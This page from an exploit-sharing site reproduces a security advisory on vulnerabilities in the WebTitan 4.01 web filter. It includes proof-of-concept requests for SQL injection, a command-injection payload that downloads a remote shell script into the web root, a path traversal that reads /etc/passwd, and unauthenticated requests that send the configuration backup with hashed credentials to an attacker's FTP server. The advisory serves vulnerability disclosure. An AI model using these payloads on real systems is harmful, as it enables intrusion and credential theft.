0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

WebTitan 4.01 (Build 68) - Multiple Vulnerabilities

Author

SEC Consult

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

title: Multiple critical vulnerabilities
            product: WebTitan
 vulnerable version: 4.01 (Build 68)
      fixed version: 4.04
             impact: critical
           homepage: http://www.webtitan.com
              found: 2014-04-07
                 by: Robert Giruckas, Mindaugas Liudavicius
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================
 
Vendor description:
-------------------
"WebTitan offers ultimate protection from internet based threats and powerful
web filtering functionalities to SMBs, Service Providers and Education sectors
around the World."
 
Source: http://www.webtitan.com/about-us/webtitan
 
 
Business recommendation:
------------------------
Multiple critical security vulnerabilities have been identified in the WebTitan
system. Exploiting these vulnerabilities potential attackers could take control
over the entire system.
 
It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.
 
 
Vulnerability overview/description:
-----------------------------------
1) SQL Injection
A SQL injection vulnerability in the /categories-x.php script allows
unauthenticated remote attackers to execute arbitrary SQL commands via the
"sortkey" parameter.
 
2) Remote command execution
Multiple remote command execution vulnerabilities were detected in the
WebTitan GUI. This security flaw exists due to lack of input validation. An
authenticated attacker of any role (Administrator, Policy Manager, Report
Manager) can execute arbitrary OS commands with the privileges of the web
server.
 
3) Path traversal
The web GUI fails to properly filter user input passed to the logfile
parameter. This leads to arbitrary file download by unauthenticated attackers.
 
4) Unprotected Access
The web GUI does not require authentication for certain PHP scripts. This
security issue allows an unauthenticated remote attacker to download Webtitan
configuration backup (including hashed user credentials) to the attacker's FTP
server.
 
 
Proof of concept:
-----------------
1) SQL Injection
The manipulation of the "sortkey" parameter allows users to modify the
original SQL query.
 
    GET /categories-x.php HTTP/1.1
    /categories-x.php?getcategories&sortkey=name) limit 1;--
    /categories-x.php?getcategories&sortkey=name) limit 5;--
 
2) Remote command execution
Due to improper user input validation it is possible to inject arbitrary OS
commands using backticks ``. Some of the affected files do not sanitize any
type of shell metacharacters, this allows an attacker to use more flexible OS
commands. Tested and working payload for most scripts: `/usr/local/bin/wget
http://<URL to shell script> -O /usr/blocker/www/graph/CPU/xshell.php`
 
Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php,
scheduledreports-x.php, reporting-x.php, network-x.php
 
    a. logs-x.php, vulnerable parameters: fname, logfile
        /logs-x.php?jaction=view&fname=webtitan.log;ls -la
        /logs-x.php POST Content: jaction=delete&logfile=<PAYLOAD>
 
    b. users-x.php, vulnerable parameters: ldapserver
       /users-x.php?findLdapDC=1&ldapserver=<PAYLOAD>
 
    c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost
        /support-x.php POST Content: jaction=ping&pinghost=<PAYLOAD>
        /support-x.php POST Content: jaction=ping&dighost=<PAYLOAD>
        /support-x.php POST Content: jaction=ping&tracehost=<PAYLOAD>
 
    d. time-x.php, vulnerable parameters: ntpserversList
       /time-x.php POST Content:
jaction=ntpSync&timezone=Europe%2FLondon&ntp=1&ntpservers_entry=&date_month=4&date_day=8&date_year=2014&h_time=9&m_time=57&ntpserversList=<PAYLOAD>
 
    e. scheduledreports-x.php, vulnerable parameters: reportid
       /scheduledreports-x.php?runReport=1&reportid=<PAYLOAD>
 
    f. reporting-x.php, vulnerable parameter: delegated_admin
       /reporting-x.php POST Content:
jaction=exportpdf&report=r_requests_user&period=period_today&uid=0&sourceip=0&urlid=0&groupid=0&categoryid=0&domain=&chart=pie&reporthtml=&reportid=1396860686&rowsperpage=10&currentpage=1&startdate=1396843200&enddate=1396929599&reportfilter=f_0&delegated_admin=admin';<PAYLOAD>'&gotopage=1
 
    g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols
       length), domain
       jaction=saveHostname&hostname=`root`
       jaction=saveDNS&domain=domain.com;<PAYLOAD>&dnsservers=192.168.0.1-:-
 
 
3) Path traversal
Due to missing input filtering in the logs-x.php script it is possible to
download arbitrary files without any authentication:
 
    Vulnerable parameters: logfile
    Post Content: jaction=download&logfile=../../../etc/passwd
 
4) Unprotected Access
    a. Since the script backup-x.php does not require authentication, remote
       attackers can initiate a backup of Webtitan configuration files to a remote
       FTP server by executing the following requests:
 
       /backup-x.php
       POST Content:
jaction=saveFTP&jstatus=&schedule=1&frequency=daily&hour=16&minute=38&day_of_week=Mon&day_of_month=1&ftpserver=<IP>&ftplogin=<login>&ftppassword=<pw>&ftplocation=<path>
 
       Where <IP> is the remote FTP server IP, <login> - remote FTP server
       login, <password> - remote FTP, <path> - path where to store backup
 
       With the next request, an attacker can force the backup to be uploaded
       to the attacker's FTP server:
 
       /backup-x.php
       POST Content: jaction=exportNowtoFtp
 
     b. The autoconf-x.php, contentfiltering-x.php, license-x.php, msgs.php,
        reports-drill.php scripts can be reached by an unauthenticated user. The
        categories-x.php, urls-x.php can also be accessed by faking the HTTP User-Agent
        header, by setting it to "Shockwave Flash".
 
 
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the WebTitan VMware
appliance ver. 4.0.1 (build 68). It is assumed that previous versions are
affected too.

#  0day.today [2024-07-02]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

WebTitan 4.01 (Build 68) - Multiple Vulnerabilities

Report Error

Report Error